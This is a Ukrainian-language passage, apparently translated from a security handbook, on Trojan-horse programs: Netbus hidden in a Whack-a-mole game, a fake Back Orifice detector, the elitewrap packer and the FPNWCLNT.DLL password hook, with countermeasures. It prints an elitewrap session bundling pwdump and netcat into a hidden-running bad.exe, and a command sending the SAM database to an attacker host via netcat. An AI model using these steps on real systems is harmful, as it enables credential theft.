Програми типу "троянський кінь"
Як вже згадувалося у введенні, "троянський кінь" — це програма, яка для вигляду виконує які-небудь корисні дії, проте насправді призначена зовсім для інших (часто зловмисних) дій або скритно встановлює підступні або руйнівні програми. Багато хто з розглянутих вище засобів створення "потайних ходів" може бути поміщені в зовні нешкідливі пакети, так що кінцеві користувачі навіть не зможуть здогадатися про те, наскільки небезпечні програми встановлені на їх комп'ютерах. Як інший приклад можна привести підступну програму, що маскується під файл netstat. Ця програма, на відміну від справжньої утиліти netstat, навмисно не показує деякі порти, що прослуховуються, тим самим приховуючи наявність "потайного ходу". Нижче ви познайомитеся ще з декількома прикладами програм типу "троянський кінь", таких як FPWNCLNT. DLL і "набори відмичок".
Whack-a-mole
Популярним засобом впровадження програми Netbus є гра під назвою Whack-a-mole. Сама гра є одним виконуваним файлом з ім'ям whackamole.exe, який є архівом Winzip, що самораспаковивающимся. При установці гри Whack-a-mole встановлюється і сервер Netbus з ім'ям explore.exe, а в поддереве системного реєстру Hklm\software\microsoft\ Windows\currentversion\run створюється відповідний ключ, що посилається на цей виконуваний файл. Після цього сервер Netbus запускатиметься при кожному завантаженні системи (звернете увагу на ймення explore). Всі ці дії виконуються досить непомітно і відбуваються після появи на екрані невеликої привабливої гри під назвою Whack-a-mole.
Bosniffer
Що може бути краще,
ніж інфікування якої-небудь системи за допомогою програми, призначеної для пошуку "потайних ходів"? Утиліта Bosniffer, яка начебто покликана виявляти Back Orifice, насправді є замаскованою В. Отже дотримуйтеся обережності при використанні подібних безкоштовних засобів... На щастя, цю програму можна видалити точно так, як і звичайний сервер В (див. розділи вищі).
elitewrap
Дуже популярною програмою типу "троянський кінь" є
elitewrap. Вона призначена для "упаковки" численних файлів в один виконуваний файл і подальшій їх розпаковування або запуску на видаленому вузлі. Як видно з наступного прикладу, в таку "обгортку" можна помістити також сценарії, що дозволяє зломщикам реалізувати неповторні атаки.
С:\nt\ew>elitewrap
elitewrap 1.03 - (С) Tom "elite"
Mclntyre tomsdundeecake.demon.со.uk
http://www.dundeecake.demon.co.uk/elitewrap
Stub size: 7712 bytes Enter name of output file: bad.exe
Operations: 1 - Pack only
2 - Pack and execute, visible, asynchronously 3 -
Pack and execute, hidden, asynchronously 4 - Pack and execute, visible,
synchronously 5 - Pack and execute, hidden, synchronously 6 -
Execute only, visible, asynchronously 7 - Execute only, hidden,
asynchronously 8 - Execute only, visible, synchronously 9 - Execute
only, hidden, synchronously
Enter package file #1: c:\nt\pwdump.exe
Enter operation: 1 Enter package file#2:c:\nt\nc.exe
Enter operation: 1
Enter package file #3: c:\nt\ew\attack.bat
Enter operation: 7
Enter command line:
Enter package file #4:
All done :)
Тепер у розпорядженні зломщика з'явився файл з ім'ям bad.exe. При запуску з нього витягуватимуть утиліти pwdump.exe, netcat (nc.exe), а потім запуститься командний файл attack.bat, у якому міститься проста команда, наприклад pwdump i nc.exe -n 192.168.1.1 3000. В результаті база даних SAM системи NT потрапить на комп'ютер зломщика (192 .168 .1.1, на якому утиліту netcat слід набудувати на прослуховування порту 3000).
Програму elitewrap можна виявити, якщо з виконуваного файлу зломщик забув видалити її сигнатуру. Наступна команда пошуку дозволить знайти сигнатуру в будь-якому файлі .ехе.
С:\nt\ew>find "elitewrap" bad.exe
---BAD.EXE
elitewrap Vi.03
Ключове слово "elitewrap" може змінитися, тому при виявленні програми elitewrap не слід повністю покладатися на цю ознаку.
Бібліотека FPWNCLNT . DLL для Windows NT
Одне з
таємних завдань програм типу "троянський кінь" полягає в їх маскуванні під системний компонент реєстрації в системі і захопленні імен/паролів користувачів. Одним з прикладів реалізації такого підходу є бібліотека FPNWCLNT.DLL, встановлювана на сервери NT, на яких потрібно виконувати синхронізацію паролів з системами Novell Netware. Ця бібліотека перехоплює зміни паролів перед тим, як вони будуть зашифровані і записані в базу даних SAM, що дозволяє службам Netware отримати паролі в легкому для читання вигляді, забезпечуючи тим самим єдину форму реєстрації.
У Internet був поміщений код, що дозволяє реєструвати факти зміни паролів і заносити відомості про ці зміни (а не самі паролі) у файл C:\temp\pwdchange. OUT. (Докладнішу інформацію і приклад коди можна знайти за адресою http://www.ntsecurity.net/security/passworddll.htm.) Хоча ця програма дозволяє відстежувати тільки зміну паролів, її легко модифікувати так, щоб з її допомогою можна було захоплювати і самі паролі в звичайному текстовому форматі.
Контрзаходи
Якщо немає необхідності
в синхронізації паролів між системами NT і Netware, видалите файл FPNWCLNT.DLL з каталога %systemroot*\system32. Слід перевірити також поддерево системного реєстру Hkey_local_mackine\system\currentcontrolset\ Control\lsa\notificaion Packages (Reg_multi_sz) і видалити з нього рядок FPNWCLNT. Якщо ця бібліотека, що динамічно підключається, все ж таки необхідна для роботи в змішаному середовищі, порівняєте атрибути використовуваного файлу з атрибутами його перевіреної копії (наприклад, що міститься на настановному компакт-диску) і переконаєтеся, що це початкова версія компанії Microsoft. Якщо виникли якісь сумніви, краще відновити даний файл з перевіреного носія.
|